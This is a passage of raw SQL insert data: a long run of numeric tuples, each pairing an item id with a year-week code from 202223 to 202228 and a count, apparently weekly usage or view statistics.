23',14),(4694,1,'202223',14),(4697,1,'202223',14),(84,1,'202223',15),(87,1,'202223',15),(1588,1,'202223',15),(2609,1,'202223',15),(4326,1,'202223',15),(4582,1,'202223',15),(4660,1,'202223',15),(4674,1,'202223',15),(335,1,'202223',16),(1610,1,'202223',16),(2503,1,'202223',16),(3069,1,'202223',16),(3117,1,'202223',16),(4400,1,'202223',16),(4657,1,'202223',16),(4703,1,'202223',16),(76,1,'202223',17),(108,1,'202223',17),(2804,1,'202223',17),(3063,1,'202223',17),(3781,1,'202223',17),(4654,1,'202223',17),(4706,1,'202223',17),(1600,1,'202223',18),(3764,1,'202223',18),(89,1,'202223',19),(91,1,'202223',19),(1602,1,'202223',19),(2809,1,'202223',19),(3030,1,'202223',19),(4709,1,'202223',19),(1544,1,'202223',20),(1594,1,'202223',21),(1598,1,'202223',21),(68,1,'202223',30),(4457,1,'202223',31),(1586,1,'202223',44),(72,1,'202223',49),(1582,1,'202223',76),(2904,1,'202223',76),(80,1,'202223',83),(9,1,'202223',739),(470,1,'202224',1),(473,1,'202224',1),(482,1,'202224',1),(1592,1,'202224',1),(1705,1,'202224',1),(1715,1,'202224',1),(1770,1,'202224',1),(1774,1,'202224',1),(1776,1,'202224',1),(2150,1,'202224',1),(2165,1,'202224',1),(2252,1,'202224',1),(2751,1,'202224',1),(2965,1,'202224',1),(2989,1,'202224',1),(2991,1,'202224',1),(3079,1,'202224',1),(3097,1,'202224',1),(3240,1,'202224',1),(3247,1,'202224',1),(3249,1,'202224',1),(3259,1,'202224',1),(3271,1,'202224',1),(3430,1,'202224',1),(3531,1,'202224',1),(3727,1,'202224',1),(3774,1,'202224',1),(4301,1,'202224',1),(4341,1,'202224',1),(4377,1,'202224',1),(4387,1,'202224',1),(4542,1,'202224',1),(4556,1,'202224',1),(4608,1,'202224',1),(4612,1,'202224',1),(4668,1,'202224',1),(485,1,'202224',2),(488,1,'202224',2),(1590,1,'202224',2),(1604,1,'202224',2),(1612,1,'202224',2),(1697,1,'202224',2),(1703,1,'202224',2),(1711,1,'202224',2),(1713,1,'202224',2),(1720,1,'202224',2),(1726,1,'202224',2),(1732,1,'202224',2),(1739,1,'202224',2),(1745,1,'202224',2),(1751,1,'202224',2),(2063,1,'202224',2),(2293,1,'202224',2),(2609,1,'202224',2),(2617,1,'202224',2),(2658,1,'202224',2),(2993,1,'202224',2),(3023,1,'202224',2),(3045,1,'202224',2),(3092,1,'202224',2),(3096,1,'202224',2),(3104,1,'202224',2),(3107,1,'202224',2),(3109,1,'202224',2),(3243,1,'202224',2),(3265,1,'202224',2),(3267,1,'202224',2),(3273,1,'202224',2),(3278,1,'202224',2),(3280,1,'202224',2),(3486,1,'202224',2),(3498,1,'202224',2),(3714,1,'202224',2),(3724,1,'202224',2),(3731,1,'202224',2),(3735,1,'202224',2),(3746,1,'202224',2),(3749,1,'202224',2),(3771,1,'202224',2),(4329,1,'202224',2),(4368,1,'202224',2),(4408,1,'202224',2),(4424,1,'202224',2),(4440,1,'202224',2),(4587,1,'202224',2),(4685,1,'202224',2),(474,1,'202224',3),(479,1,'202224',3),(481,1,'202224',3),(486,1,'202224',3),(570,1,'202224',3),(1584,1,'202224',3),(1614,1,'202224',3),(1730,1,'202224',3),(1734,1,'202224',3),(1743,1,'202224',3),(1747,1,'202224',3),(1766,1,'202224',3),(1772,1,'202224',3),(1778,1,'202224',3),(1780,1,'202224',3),(2148,1,'202224',3),(2154,1,'202224',3),(2178,1,'202224',3),(2248,1,'202224',3),(2558,1,'202224',3),(2956,1,'202224',3),(3034,1,'202224',3),(3038,1,'202224',3),(3041,1,'202224',3),(3229,1,'202224',3),(3245,1,'202224',3),(3251,1,'202224',3),(3253,1,'202224',3),(3257,1,'202224',3),(3263,1,'202224',3),(3269,1,'202224',3),(3275,1,'202224',3),(3285,1,'202224',3),(3287,1,'202224',3),(3290,1,'202224',3),(3297,1,'202224',3),(3482,1,'202224',3),(3752,1,'202224',3),(3777,1,'202224',3),(4238,1,'202224',3),(4323,1,'202224',3),(4335,1,'202224',3),(4363,1,'202224',3),(4382,1,'202224',3),(4391,1,'202224',3),(4396,1,'202224',3),(4428,1,'202224',3),(4432,1,'202224',3),(4444,1,'202224',3),(4514,1,'202224',3),(4529,1,'202224',3),(4546,1,'202224',3),(4551,1,'202224',3),(4591,1,'202224',3),(4648,1,'202224',3),(102,1,'202224',4),(476,1,'202224',4),(478,1,'202224',4),(480,1,'202224',4),(483,1,'202224',4),(484,1,'202224',4),(1701,1,'202224',4),(1709,1,'202224',4),(1724,1,'202224',4),(1741,1,'202224',4),(1749,1,'202224',4),(1768,1,'202224',4),(2156,1,'202224',4),(2161,1,'202224',4),(2297,1,'202224',4),(2704,1,'202224',4),(2775,1,'202224',4),(3005,1,'202224',4),(3006,1,'202224',4),(3066,1,'202224',4),(3226,1,'202224',4),(3261,1,'202224',4),(3282,1,'202224',4),(3307,1,'202224',4),(3489,1,'202224',4),(3534,1,'202224',4),(4275,1,'202224',4),(4357,1,'202224',4),(4404,1,'202224',4),(4420,1,'202224',4),(4454,1,'202224',4),(4566,1,'202224',4),(4681,1,'202224',4),(4688,1,'202224',4),(471,1,'202224',5),(1718,1,'202224',5),(1728,1,'202224',5),(2152,1,'202224',5),(2769,1,'202224',5),(2911,1,'202224',5),(2964,1,'202224',5),(3004,1,'202224',5),(3087,1,'202224',5),(3316,1,'202224',5),(3479,1,'202224',5),(3541,1,'202224',5),(4326,1,'202224',5),(4338,1,'202224',5),(4400,1,'202224',5),(4517,1,'202224',5),(4524,1,'202224',5),(4645,1,'202224',5),(4677,1,'202224',5),(74,1,'202224',6),(467,1,'202224',6),(468,1,'202224',6),(1608,1,'202224',6),(1722,1,'202224',6),(1737,1,'202224',6),(2159,1,'202224',6),(2309,1,'202224',6),(3083,1,'202224',6),(3090,1,'202224',6),(3124,1,'202224',6),(3438,1,'202224',6),(3710,1,'202224',6),(3742,1,'202224',6),(4332,1,'202224',6),(4436,1,'202224',6),(4582,1,'202224',6),(4654,1,'202224',6),(487,1,'202224',7),(1596,1,'202224',7),(1695,1,'202224',7),(2801,1,'202224',7),(2804,1,'202224',7),(2809,1,'202224',7),(2813,1,'202224',7),(3072,1,'202224',7),(4416,1,'202224',7),(4448,1,'202224',7),(4651,1,'202224',7),(4660,1,'202224',7),(4674,1,'202224',7),(84,1,'202224',8),(477,1,'202224',8),(1707,1,'202224',8),(2296,1,'202224',8),(3060,1,'202224',8),(3069,1,'202224',8),(3102,1,'202224',8),(3313,1,'202224',8),(4412,1,'202224',8),(4663,1,'202224',8),(4697,1,'202224',8),(108,1,'202224',9),(335,1,'202224',9),(1600,1,'202224',9),(2503,1,'202224',9),(4520,1,'202224',9),(4657,1,'202224',9),(4691,1,'202224',9),(4712,1,'202224',9),(4722,1,'202224',9),(472,1,'202224',10),(1588,1,'202224',10),(1606,1,'202224',10),(3063,1,'202224',10),(3117,1,'202224',10),(3127,1,'202224',10),(1544,1,'202224',11),(1598,1,'202224',11),(2457,1,'202224',11),(3027,1,'202224',11),(3030,1,'202224',11),(4700,1,'202224',11),(4706,1,'202224',11),(469,1,'202224',12),(1610,1,'202224',12),(4703,1,'202224',12),(87,1,'202224',13),(4694,1,'202224',13),(3764,1,'202224',14),(4709,1,'202224',14),(91,1,'202224',15),(89,1,'202224',16),(1602,1,'202224',16),(4457,1,'202224',16),(3781,1,'202224',19),(68,1,'202224',21),(76,1,'202224',21),(1594,1,'202224',22),(72,1,'202224',33),(1586,1,'202224',41),(1582,1,'202224',42),(2904,1,'202224',47),(80,1,'202224',57),(9,1,'202224',619),(478,1,'202225',1),(479,1,'202225',1),(485,1,'202225',1),(1695,1,'202225',1),(1737,1,'202225',1),(1780,1,'202225',1),(2156,1,'202225',1),(2252,1,'202225',1),(2293,1,'202225',1),(2617,1,'202225',1),(2658,1,'202225',1),(2748,1,'202225',1),(3124,1,'202225',1),(3265,1,'202225',1),(3269,1,'202225',1),(3271,1,'202225',1),(3273,1,'202225',1),(3275,1,'202225',1),(3287,1,'202225',1),(3290,1,'202225',1),(3430,1,'202225',1),(3746,1,'202225',1),(4357,1,'202225',1),(4363,1,'202225',1),(4377,1,'202225',1),(4382,1,'202225',1),(4391,1,'202225',1),(4396,1,'202225',1),(4424,1,'202225',1),(4436,1,'202225',1),(4440,1,'202225',1),(4444,1,'202225',1),(4454,1,'202225',1),(4546,1,'202225',1),(4556,1,'202225',1),(4668,1,'202225',1),(4681,1,'202225',1),(110,1,'202225',2),(471,1,'202225',2),(472,1,'202225',2),(477,1,'202225',2),(481,1,'202225',2),(482,1,'202225',2),(483,1,'202225',2),(484,1,'202225',2),(487,1,'202225',2),(1590,1,'202225',2),(1592,1,'202225',2),(1705,1,'202225',2),(1709,1,'202225',2),(1715,1,'202225',2),(1741,1,'202225',2),(1743,1,'202225',2),(1747,1,'202225',2),(1751,1,'202225',2),(1768,1,'202225',2),(1782,1,'202225',2),(2150,1,'202225',2),(2159,1,'202225',2),(2161,1,'202225',2),(2248,1,'202225',2),(2296,1,'202225',2),(2769,1,'202225',2),(2911,1,'202225',2),(2993,1,'202225',2),(3034,1,'202225',2),(3041,1,'202225',2),(3104,1,'202225',2),(3107,1,'202225',2),(3109,1,'202225',2),(3226,1,'202225',2),(3245,1,'202225',2),(3247,1,'202225',2),(3249,1,'202225',2),(3253,1,'202225',2),(3257,1,'202225',2),(3259,1,'202225',2),(3261,1,'202225',2),(3263,1,'202225',2),(3278,1,'202225',2),(3297,1,'202225',2),(3486,1,'202225',2),(3489,1,'202225',2),(3735,1,'202225',2),(3738,1,'202225',2),(3749,1,'202225',2),(3752,1,'202225',2),(3771,1,'202225',2),(4301,1,'202225',2),(4323,1,'202225',2),(4368,1,'202225',2),(4373,1,'202225',2),(4387,1,'202225',2),(4404,1,'202225',2),(4448,1,'202225',2),(4514,1,'202225',2),(4517,1,'202225',2),(4524,1,'202225',2),(4591,1,'202225',2),(4685,1,'202225',2),(4688,1,'202225',2),(4697,1,'202225',2),(106,1,'202225',3),(467,1,'202225',3),(468,1,'202225',3),(473,1,'202225',3),(476,1,'202225',3),(1584,1,'202225',3),(1699,1,'202225',3),(1703,1,'202225',3),(1713,1,'202225',3),(1732,1,'202225',3),(1739,1,'202225',3),(1749,1,'202225',3),(1770,1,'202225',3),(1772,1,'202225',3),(1778,1,'202225',3),(2063,1,'202225',3),(2148,1,'202225',3),(2152,1,'202225',3),(2165,1,'202225',3),(2751,1,'202225',3),(2956,1,'202225',3),(2965,1,'202225',3),(2989,1,'202225',3),(3004,1,'202225',3),(3005,1,'202225',3),(3006,1,'202225',3),(3045,1,'202225',3),(3072,1,'202225',3),(3079,1,'202225',3),(3096,1,'202225',3),(3097,1,'202225',3),(3240,1,'202225',3),(3243,1,'202225',3),(3267,1,'202225',3),(3282,1,'202225',3),(3482,1,'202225',3),(3534,1,'202225',3),(3541,1,'202225',3),(3721,1,'202225',3),(3727,1,'202225',3),(3774,1,'202225',3),(3777,1,'202225',3),(4238,1,'202225',3),(4275,1,'202225',3),(4332,1,'202225',3),(4341,1,'202225',3),(4420,1,'202225',3),(4428,1,'202225',3),(4432,1,'202225',3),(4566,1,'202225',3),(4608,1,'202225',3),(4645,1,'202225',3),(4648,1,'202225',3),(4677,1,'202225',3),(469,1,'202225',4),(474,1,'202225',4),(486,1,'202225',4),(1697,1,'202225',4),(1701,1,'202225',4),(1711,1,'202225',4),(1720,1,'202225',4),(1722,1,'202225',4),(1726,1,'202225',4),(1745,1,'202225',4),(1766,1,'202225',4),(2154,1,'202225',4),(2178,1,'202225',4),(2297,1,'202225',4),(2558,1,'202225',4),(2775,1,'202225',4),(2813,1,'202225',4),(2964,1,'202225',4),(2991,1,'202225',4),(3092,1,'202225',4),(3280,1,'202225',4),(3285,1,'202225',4),(3307,1,'202225',4),(3316,1,'202225',4),(3438,1,'202225',4),(3498,1,'202225',4),(3710,1,'202225',4),(3714,1,'202225',4),(3724,1,'202225',4),(4329,1,'202225',4),(4335,1,'202225',4),(4412,1,'202225',4),(4551,1,'202225',4),(4587,1,'202225',4),(4712,1,'202225',4),(4722,1,'202225',4),(74,1,'202225',5),(488,1,'202225',5),(570,1,'202225',5),(1608,1,'202225',5),(1718,1,'202225',5),(1734,1,'202225',5),(1774,1,'202225',5),(2457,1,'202225',5),(2609,1,'202225',5),(2801,1,'202225',5),(3060,1,'202225',5),(3229,1,'202225',5),(4741,1,'202225',5),(102,1,'202225',6),(470,1,'202225',6),(1604,1,'202225',6),(1612,1,'202225',6),(1724,1,'202225',6),(1728,1,'202225',6),(1730,1,'202225',6),(2704,1,'202225',6),(3023,1,'202225',6),(3038,1,'202225',6),(3083,1,'202225',6),(3251,1,'202225',6),(3731,1,'202225',6),(4338,1,'202225',6),(4529,1,'202225',6),(4542,1,'202225',6),(4747,1,'202225',6),(1596,1,'202225',7),(1598,1,'202225',7),(3066,1,'202225',7),(4612,1,'202225',7),(4700,1,'202225',7),(4703,1,'202225',7),(4750,1,'202225',7),(4756,1,'202225',7),(4759,1,'202225',7),(108,1,'202225',8),(1600,1,'202225',8),(2309,1,'202225',8),(3027,1,'202225',8),(3313,1,'202225',8),(3479,1,'202225',8),(4326,1,'202225',8),(4582,1,'202225',8),(4657,1,'202225',8),(4663,1,'202225',8),(4674,1,'202225',8),(4706,1,'202225',8),(4709,1,'202225',8),(4744,1,'202225',8),(4753,1,'202225',8),(76,1,'202225',9),(84,1,'202225',9),(1614,1,'202225',9),(2804,1,'202225',9),(3117,1,'202225',9),(3127,1,'202225',9),(4654,1,'202225',9),(4660,1,'202225',9),(4691,1,'202225',9),(4694,1,'202225',9),(87,1,'202225',10),(1606,1,'202225',10),(1707,1,'202225',10),(2503,1,'202225',10),(3090,1,'202225',10),(89,1,'202225',11),(91,1,'202225',11),(1602,1,'202225',11),(2809,1,'202225',11),(3030,1,'202225',11),(3069,1,'202225',11),(3102,1,'202225',11),(3742,1,'202225',11),(3764,1,'202225',11),(3781,1,'202225',11),(4457,1,'202225',11),(4651,1,'202225',11),(335,1,'202225',12),(1544,1,'202225',12),(4400,1,'202225',12),(4520,1,'202225',12),(4765,1,'202225',12),(4768,1,'202225',12),(1588,1,'202225',13),(3063,1,'202225',13),(1610,1,'202225',14),(4762,1,'202225',15),(68,1,'202225',17),(4771,1,'202225',17),(1582,1,'202225',18),(1594,1,'202225',21),(1586,1,'202225',34),(72,1,'202225',42),(2904,1,'202225',42),(80,1,'202225',50),(9,1,'202225',639),(482,1,'202226',1),(485,1,'202226',1),(1697,1,'202226',1),(1718,1,'202226',1),(1726,1,'202226',1),(1734,1,'202226',1),(1751,1,'202226',1),(1774,1,'202226',1),(2161,1,'202226',1),(2558,1,'202226',1),(3104,1,'202226',1),(3229,1,'202226',1),(3240,1,'202226',1),(3257,1,'202226',1),(3261,1,'202226',1),(3282,1,'202226',1),(3287,1,'202226',1),(3486,1,'202226',1),(3489,1,'202226',1),(3735,1,'202226',1),(3771,1,'202226',1),(4368,1,'202226',1),(4387,1,'202226',1),(4566,1,'202226',1),(4688,1,'202226',1),(4712,1,'202226',1),(102,1,'202226',2),(110,1,'202226',2),(476,1,'202226',2),(488,1,'202226',2),(1703,1,'202226',2),(1720,1,'202226',2),(1724,1,'202226',2),(1732,1,'202226',2),(1737,1,'202226',2),(1739,1,'202226',2),(1749,1,'202226',2),(1768,1,'202226',2),(2063,1,'202226',2),(2252,1,'202226',2),(2293,1,'202226',2),(2956,1,'202226',2),(2965,1,'202226',2),(3006,1,'202226',2),(3092,1,'202226',2),(3096,1,'202226',2),(3243,1,'202226',2),(3247,1,'202226',2),(3249,1,'202226',2),(3253,1,'202226',2),(3265,1,'202226',2),(3269,1,'202226',2),(3273,1,'202226',2),(3534,1,'202226',2),(3541,1,'202226',2),(3714,1,'202226',2),(3746,1,'202226',2),(3752,1,'202226',2),(3777,1,'202226',2),(4275,1,'202226',2),(4301,1,'202226',2),(4332,1,'202226',2),(4341,1,'202226',2),(4373,1,'202226',2),(4424,1,'202226',2),(4454,1,'202226',2),(4517,1,'202226',2),(4591,1,'202226',2),(4668,1,'202226',2),(480,1,'202226',3),(481,1,'202226',3),(483,1,'202226',3),(484,1,'202226',3),(1590,1,'202226',3),(1699,1,'202226',3),(1701,1,'202226',3),(1705,1,'202226',3),(1709,1,'202226',3),(1730,1,'202226',3),(1741,1,'202226',3),(1770,1,'202226',3),(2148,1,'202226',3),(2150,1,'202226',3),(2152,1,'202226',3),(2165,1,'202226',3),(2178,1,'202226',3),(2248,1,'202226',3),(2296,1,'202226',3),(2658,1,'202226',3),(2991,1,'202226',3),(3023,1,'202226',3),(3034,1,'202226',3),(3041,1,'202226',3),(3124,1,'202226',3),(3263,1,'202226',3),(3275,1,'202226',3),(3278,1,'202226',3),(3290,1,'202226',3),(3438,1,'202226',3),(3482,1,'202226',3),(3531,1,'202226',3),(3727,1,'202226',3),(4238,1,'202226',3),(4323,1,'202226',3),(4335,1,'202226',3),(4338,1,'202226',3),(4377,1,'202226',3),(4396,1,'202226',3),(4404,1,'202226',3),(4428,1,'202226',3),(4440,1,'202226',3),(4444,1,'202226',3),(4448,1,'202226',3),(4514,1,'202226',3),(4551,1,'202226',3),(4587,1,'202226',3),(4648,1,'202226',3),(4681,1,'202226',3),(470,1,'202226',4),(473,1,'202226',4),(474,1,'202226',4),(478,1,'202226',4),(570,1,'202226',4),(1592,1,'202226',4),(1695,1,'202226',4),(1713,1,'202226',4),(1743,1,'202226',4),(1745,1,'202226',4),(1747,1,'202226',4),(1766,1,'202226',4),(1778,1,'202226',4),(2748,1,'202226',4),(2751,1,'202226',4),(2813,1,'202226',4),(2964,1,'202226',4),(3005,1,'202226',4),(3045,1,'202226',4),(3087,1,'202226',4),(3097,1,'202226',4),(3109,1,'202226',4),(3251,1,'202226',4),(3267,1,'202226',4),(3280,1,'202226',4),(3285,1,'202226',4),(3430,1,'202226',4),(3710,1,'202226',4),(3724,1,'202226',4),(3749,1,'202226',4),(3774,1,'202226',4),(4329,1,'202226',4),(4382,1,'202226',4),(4612,1,'202226',4),(4677,1,'202226',4),(4697,1,'202226',4),(4700,1,'202226',4),(106,1,'202226',5),(469,1,'202226',5),(486,1,'202226',5),(1722,1,'202226',5),(1728,1,'202226',5),(1776,1,'202226',5),(1782,1,'202226',5),(2154,1,'202226',5),(2457,1,'202226',5),(2609,1,'202226',5),(2617,1,'202226',5),(2775,1,'202226',5),(3038,1,'202226',5),(3066,1,'202226',5),(3072,1,'202226',5),(3079,1,'202226',5),(3083,1,'202226',5),(3245,1,'202226',5),(3271,1,'202226',5),(3297,1,'202226',5),(3316,1,'202226',5),(3479,1,'202226',5),(3721,1,'202226',5),(4391,1,'202226',5),(4420,1,'202226',5),(4432,1,'202226',5),(4436,1,'202226',5),(4542,1,'202226',5),(4546,1,'202226',5),(4703,1,'202226',5),(4706,1,'202226',5),(4759,1,'202226',5),(472,1,'202226',6),(477,1,'202226',6),(1604,1,'202226',6),(1614,1,'202226',6),(2801,1,'202226',6),(3004,1,'202226',6),(3498,1,'202226',6),(4416,1,'202226',6),(4556,1,'202226',6),(4608,1,'202226',6),(4645,1,'202226',6),(4709,1,'202226',6),(4741,1,'202226',6),(467,1,'202226',7),(471,1,'202226',7),(479,1,'202226',7),(487,1,'202226',7),(1584,1,'202226',7),(2159,1,'202226',7),(2704,1,'202226',7),(2769,1,'202226',7),(3090,1,'202226',7),(4408,1,'202226',7),(4753,1,'202226',7),(4756,1,'202226',7),(468,1,'202226',8),(2911,1,'202226',8),(3102,1,'202226',8),(3731,1,'202226',8),(4524,1,'202226',8),(4663,1,'202226',8),(4685,1,'202226',8),(4762,1,'202226',8),(1588,1,'202226',9),(1707,1,'202226',9),(2297,1,'202226',9),(3060,1,'202226',9),(3742,1,'202226',9),(4651,1,'202226',9),(4722,1,'202226',9),(4744,1,'202226',9),(1602,1,'202226',10),(2309,1,'202226',10),(4400,1,'202226',10),(4657,1,'202226',10),(4747,1,'202226',10),(87,1,'202226',11),(335,1,'202226',11),(2809,1,'202226',11),(3313,1,'202226',11),(4457,1,'202226',11),(4529,1,'202226',11),(4582,1,'202226',11),(4654,1,'202226',11),(4660,1,'202226',11),(4674,1,'202226',11),(4694,1,'202226',11),(4750,1,'202226',11),(74,1,'202226',12),(1596,1,'202226',12),(2804,1,'202226',12),(3027,1,'202226',12),(3063,1,'202226',12),(3127,1,'202226',12),(3764,1,'202226',12),(4412,1,'202226',12),(4520,1,'202226',12),(1544,1,'202226',13),(1582,1,'202226',13),(1598,1,'202226',13),(3781,1,'202226',13),(4326,1,'202226',13),(4768,1,'202226',13),(4771,1,'202226',13),(84,1,'202226',14),(91,1,'202226',14),(3069,1,'202226',14),(3117,1,'202226',14),(4691,1,'202226',14),(1606,1,'202226',15),(1610,1,'202226',15),(2503,1,'202226',15),(89,1,'202226',17),(108,1,'202226',17),(1608,1,'202226',17),(76,1,'202226',18),(1600,1,'202226',18),(3030,1,'202226',18),(4765,1,'202226',18),(1612,1,'202226',22),(1594,1,'202226',23),(1586,1,'202226',30),(68,1,'202226',36),(2904,1,'202226',45),(72,1,'202226',54),(80,1,'202226',54),(9,1,'202226',652),(110,1,'202227',1),(476,1,'202227',1),(2293,1,'202227',1),(2965,1,'202227',1),(473,1,'202227',2),(481,1,'202227',2),(482,1,'202227',2),(1584,1,'202227',2),(1699,1,'202227',2),(1724,1,'202227',2),(1774,1,'202227',2),(1782,1,'202227',2),(2161,1,'202227',2),(2296,1,'202227',2),(2704,1,'202227',2),(3738,1,'202227',2),(3777,1,'202227',2),(4329,1,'202227',2),(4357,1,'202227',2),(4363,1,'202227',2),(4377,1,'202227',2),(4448,1,'202227',2),(4524,1,'202227',2),(4546,1,'202227',2),(102,1,'202227',3),(477,1,'202227',3),(478,1,'202227',3),(483,1,'202227',3),(484,1,'202227',3),(486,1,'202227',3),(1590,1,'202227',3),(1592,1,'202227',3),(1604,1,'202227',3),(1697,1,'202227',3),(1707,1,'202227',3),(1711,1,'202227',3),(1713,1,'202227',3),(1732,1,'202227',3),(1734,1,'202227',3),(1737,1,'202227',3),(1743,1,'202227',3),(1747,1,'202227',3),(1751,1,'202227',3),(2063,1,'202227',3),(2159,1,'202227',3),(2178,1,'202227',3),(2775,1,'202227',3),(3006,1,'202227',3),(3038,1,'202227',3),(3079,1,'202227',3),(3265,1,'202227',3),(3269,1,'202227',3),(3278,1,'202227',3),(3774,1,'202227',3),(4275,1,'202227',3),(4335,1,'202227',3),(4396,1,'202227',3),(4408,1,'202227',3),(4416,1,'202227',3),(4428,1,'202227',3),(4432,1,'202227',3),(4517,1,'202227',3),(4551,1,'202227',3),(4556,1,'202227',3),(4591,1,'202227',3),(4648,1,'202227',3),(4744,1,'202227',3),(74,1,'202227',4),(470,1,'202227',4),(471,1,'202227',4),(472,1,'202227',4),(474,1,'202227',4),(479,1,'202227',4),(480,1,'202227',4),(1695,1,'202227',4),(1703,1,'202227',4),(1715,1,'202227',4),(1720,1,'202227',4),(1730,1,'202227',4),(1749,1,'202227',4),(1770,1,'202227',4),(1776,1,'202227',4),(1778,1,'202227',4),(1780,1,'202227',4),(2150,1,'202227',4),(2152,1,'202227',4),(2154,1,'202227',4),(2156,1,'202227',4),(2558,1,'202227',4),(2748,1,'202227',4),(2989,1,'202227',4),(3041,1,'202227',4),(3087,1,'202227',4),(3097,1,'202227',4),(3245,1,'202227',4),(3247,1,'202227',4),(3263,1,'202227',4),(3271,1,'202227',4),(3290,1,'202227',4),(3297,1,'202227',4),(3430,1,'202227',4),(3531,1,'202227',4),(3735,1,'202227',4),(3749,1,'202227',4),(4323,1,'202227',4),(4341,1,'202227',4),(4368,1,'202227',4),(4373,1,'202227',4),(4382,1,'202227',4),(4404,1,'202227',4),(4444,1,'202227',4),(4454,1,'202227',4),(4514,1,'202227',4),(4542,1,'202227',4),(4566,1,'202227',4),(4608,1,'202227',4),(4668,1,'202227',4),(4688,1,'202227',4),(4741,1,'202227',4),(467,1,'202227',5),(485,1,'202227',5),(487,1,'202227',5),(488,1,'202227',5),(1701,1,'202227',5),(1705,1,'202227',5),(1726,1,'202227',5),(1739,1,'202227',5),(1772,1,'202227',5),(2165,1,'202227',5),(2658,1,'202227',5),(2769,1,'202227',5),(2801,1,'202227',5),(2813,1,'202227',5),(2956,1,'202227',5),(2964,1,'202227',5),(2993,1,'202227',5),(3004,1,'202227',5),(3005,1,'202227',5),(3023,1,'202227',5),(3083,1,'202227',5),(3109,1,'202227',5),(3229,1,'202227',5),(3240,1,'202227',5),(3243,1,'202227',5),(3251,1,'202227',5),(3259,1,'202227',5),(3261,1,'202227',5),(3267,1,'202227',5),(3273,1,'202227',5),(3498,1,'202227',5),(3746,1,'202227',5),(3771,1,'202227',5),(4332,1,'202227',5),(4338,1,'202227',5),(4387,1,'202227',5),(4420,1,'202227',5),(4440,1,'202227',5),(4587,1,'202227',5),(4681,1,'202227',5),(4706,1,'202227',5),(4712,1,'202227',5),(468,1,'202227',6),(570,1,'202227',6),(1709,1,'202227',6),(1722,1,'202227',6),(1745,1,'202227',6),(1768,1,'202227',6),(2248,1,'202227',6),(2617,1,'202227',6),(2911,1,'202227',6),(2991,1,'202227',6),(3034,1,'202227',6),(3060,1,'202227',6),(3090,1,'202227',6),(3092,1,'202227',6),(3096,1,'202227',6),(3102,1,'202227',6),(3104,1,'202227',6),(3249,1,'202227',6),(3257,1,'202227',6),(3275,1,'202227',6),(3282,1,'202227',6),(3287,1,'202227',6),(3316,1,'202227',6),(3438,1,'202227',6),(3482,1,'202227',6),(3486,1,'202227',6),(3489,1,'202227',6),(3541,1,'202227',6),(3721,1,'202227',6),(3724,1,'202227',6),(3731,1,'202227',6),(3752,1,'202227',6),(4301,1,'202227',6),(4391,1,'202227',6),(4709,1,'202227',6),(108,1,'202227',7),(335,1,'202227',7),(1718,1,'202227',7),(1741,1,'202227',7),(2148,1,'202227',7),(2252,1,'202227',7),(2457,1,'202227',7),(2503,1,'202227',7),(2609,1,'202227',7),(3045,1,'202227',7),(3107,1,'202227',7),(3124,1,'202227',7),(3226,1,'202227',7),(3280,1,'202227',7),(3285,1,'202227',7),(3534,1,'202227',7),(3714,1,'202227',7),(3727,1,'202227',7),(4238,1,'202227',7),(4412,1,'202227',7),(4424,1,'202227',7),(1598,1,'202227',8),(1608,1,'202227',8),(3030,1,'202227',8),(3313,1,'202227',8),(4326,1,'202227',8),(4582,1,'202227',8),(4612,1,'202227',8),(4651,1,'202227',8),(4660,1,'202227',8),(4685,1,'202227',8),(4691,1,'202227',8),(4700,1,'202227',8),(4703,1,'202227',8),(4722,1,'202227',8),(76,1,'202227',9),(1614,1,'202227',9),(2751,1,'202227',9),(2804,1,'202227',9),(3069,1,'202227',9),(3117,1,'202227',9),(3479,1,'202227',9),(3710,1,'202227',9),(3742,1,'202227',9),(4436,1,'202227',9),(4645,1,'202227',9),(469,1,'202227',10),(1766,1,'202227',10),(2809,1,'202227',10),(3063,1,'202227',10),(3307,1,'202227',10),(4654,1,'202227',10),(4657,1,'202227',10),(4663,1,'202227',10),(4677,1,'202227',10),(4753,1,'202227',10),(4756,1,'202227',10),(84,1,'202227',11),(87,1,'202227',11),(89,1,'202227',11),(1544,1,'202227',11),(1600,1,'202227',11),(1610,1,'202227',11),(2297,1,'202227',11),(3072,1,'202227',11),(3253,1,'202227',11),(4697,1,'202227',11),(4759,1,'202227',11),(4776,1,'202227',11),(91,1,'202227',12),(3127,1,'202227',12),(4400,1,'202227',12),(4529,1,'202227',12),(4674,1,'202227',12),(4694,1,'202227',12),(4747,1,'202227',12),(4771,1,'202227',12),(3027,1,'202227',13),(4750,1,'202227',13),(4762,1,'202227',13),(68,1,'202227',14),(1588,1,'202227',14),(1594,1,'202227',14),(1606,1,'202227',14),(1612,1,'202227',14),(1728,1,'202227',14),(3066,1,'202227',14),(3781,1,'202227',14),(4765,1,'202227',14),(1582,1,'202227',15),(1596,1,'202227',15),(4768,1,'202227',15),(2309,1,'202227',16),(3764,1,'202227',16),(1602,1,'202227',17),(4520,1,'202227',18),(4457,1,'202227',20),(2904,1,'202227',21),(1586,1,'202227',32),(72,1,'202227',40),(80,1,'202227',72),(9,1,'202227',708),(570,1,'202228',1),(1590,1,'202228',1),(1726,1,'202228',1),(1734,1,'202228',1),(1739,1,'202228',1),(1745,1,'202228',1),(1749,1,'202228',1),(1772,1,'202228',1),(2148,1,'202228',1),(2156,1,'202228',1),(2161,1,'202228',1),(2748,1,'202228',1),(2993,1,'202228',1),(3096,1,'202228',1),(3107,1,'202228',1),(3226,1,'202228',1),(3229,1,'202228',1),(3240,1,'202228',1),(3249,1,'202228',1),(3271,1,'202228',1),(3280,1,'202228',1),(3282,1,'202228',1),(3297,1,'202228',1),(3438,1,'202228',1),(3541,1,'202228',1),(3752,1,'202228',1),(4341,1,'202228',1),(4363,1,'202228',1),(4373,1,'202228',1),(4382,1,'202228',1),(4404,1,'202228',1),(4408,1,'202228',1),(4436,1,'202228',1),(4542,1,'202228',1),(4608,1,'202228',1),(4681,1,'202228',1),(102,1,'202228',2),(106,1,'202228',2),(1699,1,'202228',2),(1701,1,'202228',2),(1703,1,'202228',2),(1705,1,'202228',2),(1707,1,'202228',2),(1709,1,'202228',2),(1718,1,'202228',2),(1737,1,'202228',2),(1741,1,'202228',2),(1776,1,'202228',2),(2150,1,'202228',2),(2178,1,'202228',2),(2293,1,'202228',2),(2296,1,'202228',2),(2558,1,'202228',2),(2956,1,'202228',2),(2989,1,'202228',2),(2991,1,'202228',2),(3004,1,'202228',2),(3006,1,'202228',2),(3092,1,'202228',2),(3097,1,'202228',2),(3124,1,'202228',2),(3243,1,'202228',2),(3247,1,'202228',2),(3257,1,'202228',2),(3261,1,'202228',2),(3273,1,'202228',